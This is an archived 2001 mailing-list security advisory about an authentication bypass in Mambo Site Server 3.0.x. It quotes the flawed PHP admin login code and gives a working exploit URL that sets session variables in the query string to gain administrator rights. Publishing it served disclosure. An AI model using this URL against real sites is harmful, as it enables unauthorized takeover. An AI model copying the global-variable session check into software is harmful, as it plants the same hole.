OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: root (Reverse) (rootreverseonline.com)
Date: Wed Jul 25 2001 - 06:42:09 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Serious security hole in Mambo Site Server version 3.0.X
    Jul, 24 2001
    by: Ismael Peinado Palomo - postmasterreverseonline.com
    www.reverseonline.com

    Summary
    Mambo Site Server is a dynamic portal engine and content management tool
    based on PHP and MySQL.

    Details
    Vulnerable systems:
    Mambo Site Server version 3.0.0 - 3.0.5

    Immune systems:

    Impact:
    Any user can gain administrator privileges.

    Exploits:

    Under 'administrator/' dir. we found that index.php checks the user and
    password:

    if (isset($submit)){
      $query = "SELECT id, password, name FROM users WHERE username='$myname'
    AND (usertype='administrator' OR usertype='superadministrator')";
      $result = $database->openConnectionWithReturn($query);
      if (mysql_num_rows($result)!= 0){
       list($userid, $dbpass, $fullname) = mysql_fetch_array($result);

       .....

       if (strcmp($dbpass,$pass)) {
        //if the password entered does not match the database record ask user to
    login again
        print "<SCRIPT>alert('Incorrect Username and Password, please try
    again'); document.location.href='index.php';</SCRIPT>\n";
       }else {
        //if the password matches the database
        if ($remember!="on"){
         //if the user does not want the password remembered and the cookie is
    set, delete the cookie
         if ($passwordcookie!=""){
          setcookie("passwordcookie");
          $passwordcookie="";
         }
        }
        //set up the admin session then take the user into the admin section of
    the site
        session_register("myname");
        session_register("fullname");
        session_register("userid");
        print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
        print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";

       }
      }else {
       print "<SCRIPT>alert('Incorrect Username and Password, please try
    again'); document.location.href='index.php';</SCRIPT>\n";
      }

    as we can see if the password for administrator matches the one in the
    database, some variables are registered in the session and we are redirected
    to index2.php...so lets take a look at index2.php....

     if (!$PHPSESSID){
      print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
      exit(0);
      }
     else {
      session_start();
      if (!$myname) session_register("myname");
      if (!$fullname) session_register("fullname");
      if (!$uid) session_register("userid");
      }

    Here we can see the only verification of a valid user is through the global
    var. PHPSESSID, so if we declare that variable on the url, and set the
    'myname','fullname' and 'userid' we can gain administrative control...so
    we'll test:

    http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&full
    name=admin&userid=administrator

    BINGO!! now we have full administrative privileges...that's a typical
    example of PHP hacking...it's clear that security can't rely on global
    variables since they may be modifyed through url parsing.

    Ismael Peinado Palomo
    Ingeniero Jefe I+D
    postmasterreverseonline.com
    www.reverseonline.com